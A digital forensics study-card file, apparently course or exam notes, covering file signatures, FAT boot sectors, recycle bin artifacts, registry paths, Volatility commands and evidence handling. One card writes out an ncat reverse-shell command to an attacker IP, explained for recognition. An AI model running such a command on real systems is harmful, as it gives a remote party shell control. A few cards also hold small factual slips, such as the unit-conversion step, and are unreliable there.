Alternate Data Streams,Use command: <samp>dir /r</samp> to reveal ADS hidden in files.
Authentication Methods,<ul><li>MD5  (128-bit)</li><li>SHA-1  (160-bit) </li><li>SHA-2 (256/512-bit)</li></ul>
Calculation of Duplication/Transfer Rate,"<ol><li>Convert the size of the disk to bytes. MB is 10^6, GB is 10^9, and so on. Example: 640 GB = 640,000,000,000 Bytes</li><li>Convert time for transfer to seconds</li><li>Divide the size in bytes by the time in seconds</li><li>Convert to suitable units by dividing by 1024. MB is /1024/1024, GB is /1024/1024, and so on.</li></ol>"
Calculation of File Slack,"File slack is the space between the end of a file and the end of the last cluster used by that file.<br><br>Example:<br>Consider an NTFS file system with a 2048-byte cluster and 512-byte sectors. A file of 2543 bytes resides in 2 clusters.<br>To calculate the size of the file slack, since the file takes up 1 entire cluster and has some left, we use that remaining file size to subtract from the size of the remaining cluster.<br><i>2048 - (2543-2048) = 1553 bytes<i>"
Chain of Custody,"<ul><li>A chain of custody is a written record consisting of all the processes involved in the seizure, custody, control, transfer, analysis, and disposition of physical or electronic device.</li><li>It includes the details of people, time, and purpose involved in the investigation and evidence maintenance processes.</li><li>It tracks the collected evidence closely so as to preserve its integrity.</li></ul>"
Challenges in live forensics,High speed and large volumes of data that modern day computers produce; speed and ability of the forensics team.
Deleted Files in Windows Vista & Windows 7/8/10,"<ul><li>Recycle bin folder is <b>\$Recycle.Bin</b> at the root of the volume.</li><li>No INFO2 File unlike Windows XP.</li><li>When a file is moved to the recycle bin, it is renamed with a random file name starting with <b class='red'>$R</b>, with its extension unchanged from the original deleted file.  </li><li>Accompanying this file is an administrative file with the same  random file name and extension, starting with <b class='red'>$I</b>.</li><li>This file contains the information which Vista/Windows 7/8/10 uses to store the deleted files original name and location.</li></ul>"
Destroying messages hidden in LSB,<ul><li>Randomly flipping the LSB</li><li>Compression Attack (Compress the image)</li><li>Save the photo in another format (e.g. JPG to PNG)</li></ul>
File Signatures / File Headers / File Trailers,"A list of file headers and file trailers for some common file formats. Use wxHexEditor to search and find these file headers/traliers.<table><thead><tr><th>File Header (HEX)</th><th>File Header (ASCII)</th><th>File Trailer (HEX)</th><th>File Trailer (ASCII)</th><th>File Extension</th><th>File Description</th></tr></thead><tbody><tr><td>00 00 00 0C 6A 50 20 20</td><td>....jP</td><td>0D 0A</td><td>..</td><td>JP2</td><td>Various JPEG-2000 Image File Formats</td></tr><tr><td>00 00 00 14 66 74 79 70</td><td>....ftyp</td><td>69 73 6F 6D</td><td>isom</td><td>MP4</td><td>ISO Base Media file (MPEG-4) v1</td></tr><tr><td>00 00 00 18 66 74 79 70</td><td>....ftyp</td><td>71 74 20 20</td><td>qt</td><td>MOV</td><td>QuickTime movie file</td></tr><tr><td>00 00 00 14 66 74 79 70</td><td>....ftyp</td><td>33 67 70 35</td><td>3gp5</td><td>MP4</td><td>MPEG-4 video files</td></tr><tr><td>00 00 00 14 66 74 79 70</td><td>....ftyp</td><td>6D 70 34 32</td><td>mp42</td><td>M4V</td><td>MPEG-4 video/QuickTime file</td></tr><tr><td>00 00 00 1C 66 74 79 70</td><td>....ftyp</td><td>4D 53 4E 56 01 29 00 46<br>4D 53 4E 56 6D 70 34 32</td><td>MSNV.).F<br>MSNVmp42<br></td><td>MP4</td><td>MPEG-4 video file</td></tr><tr><td>00 00 00 20 66 74 79 70</td><td>... ftyp</td><td>4D 34 41 20</td><td>M4A</td><td>M4A</td><td>Apple Lossless Audio Codec file</td></tr><tr><td>00 00 01 00</td><td>....</td><td>-</td><td>-</td><td>ICO<br>SPL<br></td><td>Windows icon file<br>Windows NT/2000/XP printer spool file<br></td></tr><tr><td>[512 byte offset]<br>0F 00 E8 03</td><td>..&egrave;.</td><td>-</td><td>-</td><td>PPT</td><td>PowerPoint presentation subheader (MS Office)</td></tr><tr><td>[512 byte offset]<br>A0 46 1D F0</td><td>F.&eth;</td><td>-</td><td>-</td><td>PPT</td><td>PowerPoint presentation subheader (MS Office)</td></tr><tr><td>[512 byte offset]<br>EC A5 C1 00</td><td>&igrave;&yen;&Aacute;.</td><td>-</td><td>-</td><td>DOC</td><td>Word document subheader (MS Office)</td></tr><tr><td>[512 byte offset]<br>FD FF FF FF nn 00<br>OR<br>FD FF FF FF nn 02<br></td><td>&yacute;&yuml;&yuml;&yuml;..</td><td>-</td><td>-</td><td>XLS</td><td>Excel spreadsheet subheader (MS Office)</td></tr><tr><td>FF D8 FF E0 xx xx 4A 46 49 46 00</td><td>&yuml;&Oslash;&yuml;&agrave;..JFIF.</td><td>FF D9</td><td>&yuml;&Ugrave;</td><td>JFIF, JPE, JPEG, JPG</td><td>JPEG/JFIF graphics file</td></tr><tr><td>89 50 4E 47 0D 0A 1A 0A</td><td>&permil;PNG....</td><td>49 45 4E 44 AE 42 60 82</td><td>IEND&reg;B`</td><td>PNG</td><td>Portable Network Graphics file</td></tr></tbody></table>"
File types of steganography,"<ul><li><b>Image Steganography</b>: JPEG/JFIF (.jpg, .jpeg), .png, .bmp, .tiff, .webp, .gif)</li><li><b>Audio Steganography</b>: .wav, .mp3, .avi</li><li><b>Video Steganography</b>: .mp4, .mov, .wmv, .webm, .flv</li></ul>"
Handle,"A handle is a connection from a process to an object or resource in a Windows operating system. Operating systems use handles to reference internal objects such as files, registry keys, and other resources.<br><br>Reviewing handles can tell you if a process uses the network and if it has any open files (such as log files for sniffers or keystroke loggers) as well as the security context in which the process is running."
Hash Value,"<ul><li>In Computer Forensics, hashes are used to uniquely identify a specific file (e.g. legitimate software, malware, etc.) or disk drive.  The hash value generated from a file becomes its ""digital fingerprint"".  MD5 and SHA1 are two common hash algorithms used in computer forensics.</li><li>Hash codes can be used to quickly match files found during your investigations to lists of ""Known Files"" maintained by the Government and Law Enforcement Agencies.</li></ul>"
How to handle hard drives,<ul><li>Perform bit-stream imaging of the mathematic hard drive. Conduct his investigation on the duplicate image.</li><li> Ensures that the chain of custody is in order and the magnetic hard drive is secured and accountable at all times during different stages of his investigation.</li></ul><br>Related questions:<i><ul><li>A forensic investigator was instructed to work on a seized magnetic hard drive. What actions should he take on the hard drive so that he can accurately conduct his investigation? Select the best TWO answers.</li></ul></i>
INFO/INFO2,"Only used in Windows XP. Each user has a hidden file called INFO2 created the first time the Recycle Bin is used. It is used to keep track of the deleted files and folders original location, along with file size and deletion time.<br><br>When a file is sent to the Recycle Bin, the file is renamed using the following convention:<br><samp>D%DriveLetter%_%IndexNumber%_%FileExtension%</samp><br><br><b>D%DriveLetter%</b>:<ul><li>The ""D"" stands for Drive.</li><li>%DriveLetter% is the drive that the file resided on.</li><li>Each drive has its own Recycler directory and INFO2 file for each user that has deleted files from the drive.</li><li>The INFO2 files for Drive C: will only have entries related to Drive C:, the INFO2 files for Drive D: will only have entries related to Drive D: and so forth.</li></ul>"
Information in Boot Record,"<i>(Typically, use wxHexEditor to open the .dat file to examine. You can also use FTK Imager but it is not as useful)</i><br><h3>Initial 36 Bytes (same for FAT12/16 and FAT32):</h3><table><thead><tr><th>Byte Range</th><th>Description</th><th>Essential</th></tr></thead><tbody><tr><td>0-2</td><td>Assembly instruction to jump to boot code.</td><td>No (unless it 's a bootable file system)</td></tr><tr><td>3-10</td><td>OEM Name in ASCII</td><td>No</td></tr><tr><td>11-12</td><td>Bytes per sector <b>(SECTOR SIZE)</b>. Allowed values include 512, 1024, 2048 and 4096<br><i>(wxHexEditor may show the value 514 instead of 512. In that case, just use 512)</i></td><td>Yes</td></tr><tr><td>13-13</td><td>Sectors per cluster (Used to calculate <b>CLUSTER SIZE</b>). Allowed values are powers of 2, but cluster size must be 32KB or smaller.</td><td>Yes</td></tr><tr><td>14-15</td><td>Size in sectors of the reserved area.</td><td>Yes</td></tr><tr><td>16-16</td><td>Number of FATs. Typically 2 for redundancy, but according to Microsoft, it can be 1 for some small storage devices.<br></td><td>Yes</td></tr><tr><td>17-18</td><td>Max. no. of files in the root directory for FAT12 and FAT16. This is 0 for FAT32 and typically 512 for FAT16.</td><td>Yes</td></tr><tr><td>19-20</td><td>16-bit value of no. of sectors in file system. If the no. of sectors is larger than can be represented in this 2-byte value, a 4-byte value exists later in the data structure and this should be 0.</td><td>Yes</td></tr><tr><td>21-21</td><td>Media Type. According to the Microsoft documentation, 0xf8 should be used for fixed disks and 0xf0 for removable.</td><td>No</td></tr><tr><td>22-23</td><td>16-bit size in sectors of each FAT for FAT12 and FAT16. For FAT32, this field is 0.</td><td>Yes<br></td></tr><tr><td>24-25</td><td>Sectors per track of storage device.</td><td>No</td></tr><tr><td>26-27</td><td>No. of heads in storage device.</td><td>No</td></tr><tr><td>28-31</td><td>No. of sectors before start of partition.</td><td>No</td></tr><tr><td>32-35<br></td><td>32-bit value of the no. of sectors in file system. Either this value or the 16-bit value above must be 0.</td><td>Yes</td></tr></tbody></table><br><h3>Remaining bytes in boot sector for FAT12/16:</h3><table><thead><tr><th>Byte Range</th><th>Description</th><th>Essential</th></tr></thead><tbody><tr><td>36-36</td><td>BIOS INT 13h drive number</td><td>No</td></tr><tr><td>37-37</td><td>Not used</td><td>No</td></tr><tr><td>38-38</td><td>Extended boot signature to identify if the next three values are valid. The signature is 0x29.</td><td>No</td></tr><tr><td>39-42</td><td>Volume serial no., which some versions of Windows will calculate based on creation date and time.</td><td>No</td></tr><tr><td>43-53</td><td><b>VOLUME LABEL</b> in ASCII. User chooses this value when creating the file system.</td><td>No</td></tr><tr><td>54-61</td><td>File system type label in ASCII. Standard values include ""FAT"", ""FAT12"", and ""FAT16"", but nothing is required.</td><td>No</td></tr><tr><td>62-509</td><td>Not used.</td><td>No</td></tr><tr><td>510-511</td><td>Signature value (0xAA55)</td><td>No</td></tr></tbody></table><br><h3>Remaining bytes in boot sector for FAT32:</h3><table><thead><tr><th>Byte Range</th><th>Description</th><th>Essential</th></tr></thead><tbody><tr><td>36-39</td><td>32-bit size in sectors of one FAT.</td><td>Yes</td></tr><tr><td>40-41<br></td><td>Defines how multiple FAT structures are written to. If bit 7 is 1, only one of the FAT structures is active and its index is described in bits 0-3. Otherwise, all FAT structures are mirrors of each other.</td><td>Yes</td></tr><tr><td>42-43</td><td>The major and minor version number.</td><td>Yes</td></tr><tr><td>44-47</td><td>Cluster where root directory can be found.</td><td>Yes</td></tr><tr><td>48-49</td><td>Sector where FSINFO structure can be found.</td><td>No</td></tr><tr><td>50-51</td><td>Sector where backup copy of boot sector is located (default is 6).</td><td>No</td></tr><tr><td>52-63</td><td>Reserved.</td><td>No</td></tr><tr><td>64-64</td><td>BIOS INT13th drive number.</td><td>No</td></tr><tr><td>65-65</td><td>Not used.</td><td>No</td></tr><tr><td>66-66</td><td>Extended boot signature to identify if the next three values are valid. The signature is 0x29.</td><td>No</td></tr><tr><td>67-70</td><td>Volume serial no., which some versions of Windows will calculate based on the creation date and time.<br></td><td>No</td></tr><tr><td>71-81<br></td><td><b>VOLUME LABEL</b> is ASCII. The user chooses this value when creating the file system.<br></td><td>No</td></tr><tr><td>82-89<br></td><td>File system type label in ASCII. Standard values include ""FAT32"", but nothing is required.</td><td>No</td></tr><tr><td>90-509</td><td>Not used.</td><td>No</td></tr></tbody></table>"
Information that can be obtained from Procmon,<ul><li><b>Time of Day</b>: Exact time of the event down the milliseconds.</li><li><b>Process name</b>: Name of the process that triggered the event.</li><li><b>Process ID (PID)</b>: PID of the process that triggered the event.</li><li><b>Operation</b>: Type of operation performed by the process.</li><li><b>Path</b>: Path to the file or registry key that was requested</li><li><b>Result</b>: The result of the request</li><li><b>Detail</b>: Details about the operation such as the specific registry data read/written or information on the file operation
Ingest modules in Autopsy,<ol><li>Recent Activity</li><li>Hash Lookup</li><li>File Type Identification</li><li>Embedded File Extractor</li><li>Exif Parser</li><li>Keyword Search</li><li>Email Parser</li><li>Extension Mismatch Detector</li><li>E01 Verifier</li><li>Android Analyzer (Typically not used)</li><li>Interesting Files Identifier</li><li>PhotoRec Carver</li><li>Virtual Machine Extractor</li></ol><br>Related questions:<i><ul><li>Provide the name of another program or tool which the digital forensics investigator can use in his live forensics analysis.</li></ul></i>
Internet History Files,"<h3>Windows XP</h3><ul><li>C:\Documents and Settings\<i><i>user_name</i></i>\Local Settings\History</li><li>C:\Documents and Settings\<i><i>user_name</i></i>\Local Settings\Temporary Internet Files</li><li>C:\Documents and Settings\<i><i>user_name</i></i>\Recent</li><li>C:\Documents and Settings\<i><i>user_name</i></i>\Cookies</li><li>C:\Documents and Settings\<i>user_name</i>\Favorites</li></ul><h3>Windows Vista, Windows 7</h3><ul><li>C:\Users\<i>user_name</i>\Roaming\Microsoft\Windows\Cookies</li><li>C:\Users\<i>user_name</i>\Local\Microsoft\Windows\History\</li><li>C:\Users\<i>user_name</i>\Local\Microsoft\Windows\Temporary Internet Files</li><li>C:\Users\<i>user_name</i>\Roaming\Microsoft\Internet Explorer\Userdata</li></ul><h3>Windows 8, Windows 10</h3><ul><li>C:\Users\{user}\AppData\Local\Microsoft\Internet Explorer\IECompatData\</li><li>C:\Users\{user}\AppData\Local\Microsoft\Windows\History\</li><li>C:\Users\{user}\AppData\Local\Microsoft\Windows\WebCache\</li><li>C:\Users\{user}\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore</li></ul><h3>Mac OS X</h3><ul><li>History.plist (contains the internet history list)</li><li>Bookmarks.plist (contains the book mark list)</li><li>Downloads.plist (contains the recently downloaded  list)</li><br>Alternatively:<li>/Users/{user}/Library/Safari/</li><li>/Users/{user}/Library/Caches/com.apple.Safari/</li><li>/Users/{user}/Library/Cookies/</li></ul>"
It is not possible to perform bit-stream duplication using just the tool...,Tableau Forensic SATA/IDE Bridge
List of Windows Registries,REDIRECT:Location of Windows Registries
Location of Windows Registries,"<table><tr><td>Last Login Time</td><td>SAM\Domains\Account\Users\<i>user_id</i> > Key ""F"" > Bytes 8 - 15 (use DCODE to convert the time to a timezone)</td></tr><tr><td>Last Logged On Users</td><td>SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI</td></tr><tr><td>MRU</td><td>Use the Search feature to look for different MRUs</td></tr><tr><td>Microsoft Office MRUs</td><td>SOFTWARE\Microsoft\Office\14.0\<i>application name</i>\FileMRU (application name is the name of the app, such as Word, Excel, PowerPoint. Version number may not always be 14.0)</td></tr><tr><td>Mounted Devices</td><td>SYSTEM\MountedDevices</td></tr><tr><td>Recent Typed URLs</td><td>NTUSER.DAT\Software\Microsoft\Internet Explorer\TypedURLs</td></tr><tr><td>Time Zone</td><td>SYSTEM\ControlSet001\Control\TimeZoneInformation</td></tr><tr><td></td><td></td></tr><tr><td></td><td></td></tr><tr><td></td><td></td></tr></table>"
Memory Forensics,Forensic analysis of a computer’s memory dump. Analyses RAM.
Ncat,"Networking utility that reads & writes data across networks from the command line. Uses include: Check if port is opened on a remote machine, chatting, transfer/copy files, remote shell"
ncat -nv 192.168.1.12 4444 -e cmd.exe,Instructs machine to connect to the attacker at IP 192.168.1.12 and port 4444 and gives control of shell/command prompt.
ncat options,-n: Do not resolve hostnames via DNS; -l: Bind and listen for incoming connections; -v: Set verbosity level; -p: port
netstat options,"(If unsure, typically use netstat -anb)<br><samp>-a</samp>: Disp. all connections & listening ports<br><samp>-b</samp>: Disp. executable involved in creating each connection/listening port. Need sufficient perms.<br><samp>-e</samp>: Disp. Ethernet stats, can be combined with -s<br><samp>-f:</samp> Disp. Fully Qualified Domain Names (FQDN) for foreign addresses.<br><samp>-n</samp>: Disp. addr and port no. in numerical form.<br><samp>-o</samp>: Disp. process ID associated w. each connection.<br><samp>-p <protocol></samp>: Shows connections for the protocol specified. Proto can be: TCP, UDP, TCPv6, UDPv6. If used with -s, can also use IP, IPv6, ICMP & ICMPv6.<br><samp>-q</samp>: Disp. all conn., listening ports, and bound non listening TCP ports. Bound non listening ports may or may not be assoc. with an active conn.<br><samp>-r</samp>: Disp. routing table.<br><samp>-s</samp>: Disp. per protocol statistics. By default, IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP, UDPv6.<br><samp>-t</samp>: Disp. current conn. offload state<br><samp>-x</samp>: Disp. NetworkDirect conns, listeners & shared endpoints.<br><samp>-y</samp>: Disp. TCP conn. template for all conns. Cannot be combined with other options."
Non-volatile data,"Sys. Version, Patch Level, File System Time & Date Stamps, Sys. Event Logs, User Accs., Sus. files"
Order of volatility,"Hierarchy of which types of data are more susceptible to changes. 1. Registers, Caches, Main Memory, Peripheral Memory, 2. Swap Files, 3. Network Processes, 4. System Processes, 5. File System Information, 6. Raw Disk Blocks, 7. Peripheral Data Storages"
Prevent accidental tampering with duplicated evidence,Use a write-blocker tool when connecting the duplicated disk to the PC.
Procedure before live forensics,"Don't unplug the power, isolate the system, plan and identify possible locations where data can be found."
Procedure/steps for collecting and preserving electronic evidence,"<ol><li>If the device is on, unplug the power cable from the device. This will ""freeze"" the media/hard drive in its current state. This should not be done for UNIX based systema or MS Exchange servers as serious file system damage could occur. Use the normal shutdown procedure. If it's a laptop, unplug the power cord and the battery.</li><li>Remove storage devices from the computer (e.g. hard drives, solid-state drives (SSD))</li><li>Store storage devices into anti-static evidence bags.</li><li>Seal the computer by placing evidence tape along the computer's housing, as well as ports on the computer.</li></ul>"
Process of Forensic Investigation,"<ol><li><b>Assessment:</b> Computer forensic examiners should assess digital evidence thoroughly with respect to the scope of the case to determine the course of action to take.</li><li><b>Acquisition:</b> Digital evidence, by its very nature, is fragile and can be altered, damaged, or destroyed by improper handling or examination. Examination is best conducted on a copy of the original evidence. The original evidence should be acquired in a manner that protects and preserves the integrity of the evidence.</li><li><b>Examination:</b> The purpose of the examination process is to extract and analyze digital evidence. Extraction refers to the recovery of data from its media. Analysis refers to the interpretation of the recovered data and putting it in a logical and useful format.</li><li><b>Documenting and Reporting:</b> Actions and observations should be documented throughout the forensic processing of evidence. This will conclude with the preparation of a written report of the findings.</li></ol>"
Purposes of Redline,REDIRECT:Redline Purposes
Redline purposes,"Audit and collect all running processes and drivers from memory, file-system metadata, registry data, event logs, network info, services, tasks and web history."
Registry Locations,REDIRECT:Location of Windows Registries
Registry Tools,"FTK Registry Viewer, FRED"
route print (netstat -r) purpose,Check for suspicious routing of data to check for attackers rerouting traffic to avoid security device like firewall or sniff data on network connections.
Selecting destination hard disk and ports,Selecting the most appropiate drive for bit-stream imaging:<ul><li>Size must be larger than or equal to the size of the source disk.</li><li>SSDs are better than HDDs as they have no moving parts and thus less risk of being damaged in transport.</li><li>Try to have a disk with the smallest size as possible as larger capacity means longer time for wiping and hashing.</li></ul>
Steps to use Talon duplicator,<ol><li>Connect Disk A (Suspect) and Disk C (Destination) to the source and destination ports of the Talon Duplicator using SATA cables respectively.</li><li>Ensure that drive to drive/image mode is selected.</li><li>Select the hashing algorithm (usually MD5).</li><li>Perform a wipe on the destination disk.</li><li>Start duplication</li></ol>
The purposeof using an anti-static bag is to…, Isolate the evidence from shocks due to electrical discharge.
Tools for live forensic analysis,<ul><li>Volatility</li><li>ProcMon (Process Monitor)</li></ul><br>Related questions:<i><ul><li>Provide the name of another program or tool which the digital forensics investigator can use in his live forensics analysis.</li></ul></i>
Types of File Systems & Max Size,"Windows: FAT (File Allocation Table) - FAT16/FAT32, exFAT (extended FAT), NTFS (New Technology File System), HFS (Hierarchical File System - can read but can't write)<br><br><b>List of File Systems and Maximum Filesizes</b><table><thead><td>FAT type</td><td>Max files</td><td>Max file size</td><td>Max volume size</td></thead><tbody><tr><td>FAT12</td><td>4,096</td><td>32MB</td><td>32MB</td></tr><tr><td>FAT16</td><td>65,536</td><td>2GB</td><td>2GB</td></tr><tr><td>FAT32</td><td>268,435,456</td><td>4GB</td><td>2TB</td></tr><tr><td>NTFS</td><td>4,294,967,296</td><td>256TB</td><td>256TB</td></tr></tbody></table>"
Volatile data,"Internal Routing Table, Running Processes / Services, Scheduled Jobs, Open Files, Process Mem Dumps, data in DRAM, data in memory registers."
Volatility Commands,"(To determine the <b>Profile</b>, run imageinfo, then see the <b>Suggested Profiles</b> section.<ul><li>imageinfo: <samp>volatility.exe -f memdump.mem imageinfo</samp></li><li>netscan: volatility.exe -f memdump.mem --profile=Win7SP1x86 netscan (OPTIONAL - add this to filter established connections: <samp>| findstr ""ESTABLISHED""</samp>)</li><li>pslist: <samp>volatility.exe -f memdump.mem --profile=Win7SP1x86 pslist</samp></li><li>psscan:<samp> volatility.exe -f memdump.mem --profile=Win7SP1x86 psscan</samp></li><li>pstree: <samp>volatility.exe -f memdump.mem --profile=Win7SP1x86 pstree</samp></li><li>cmdline: <samp>volatility.exe -f memdump.mem --profile=Win7SP1x86 cmdline</samp></li><li>memdump: <samp>volatility.exe -f memdump.mem --profile=Win7SP1x86 memdump --dump-dir=./ -p 2912</samp> (2912 is a PID)</li><li>procdump: <samp>volatility.exe -f memdump.mem --profile=Win7SP1x86 procdump --dump-dir=./ -p 4048</samp></li></ul>"
Volatility Plugins,<b>imageinfo</b>: Identify info for the image<br><b>netscan</b>: Scan for TCP connections and sockets<br><b>pslist</b>: High level view of running processes<br><b>psscan</b>: Scan memory for EPROCESS blocks<br><b>pstree</b>: Disp. parent-child process relationships<br><b>cmdline</b>: Displays commands and arguments executed via command prompt.<br><b>memdump</b>: Extract every memory section into one file<br><b>procdump</b>: Dump process to executable sample.
When to do live forensics?,If the system needs to be kept running and the response team used the OS and other local applications to view log files and account information. See Why Live Forensics for reasons.
Which of the following file extensions are considered to be forensically examinable disk image formats?,.aff and .e01
Which of the following information is in the metadata of a file?,"<ol><li class='red'>The initial user (author) who created the file</li><li class='red'>The size of the file</li><li>The user who deleted the file</li><li class='red'>The last modified date/time of the file</li><li class='red'>The format type of the file</li></ol>1, 2, 4 and 5."
Which of the following statement is TRUE with regards to hashing?,Compressing a file will result in a change to its hash value.
Why live forensics?,If there is no suitable media (e.g. server too big) or no time to do bit-stream imaging.
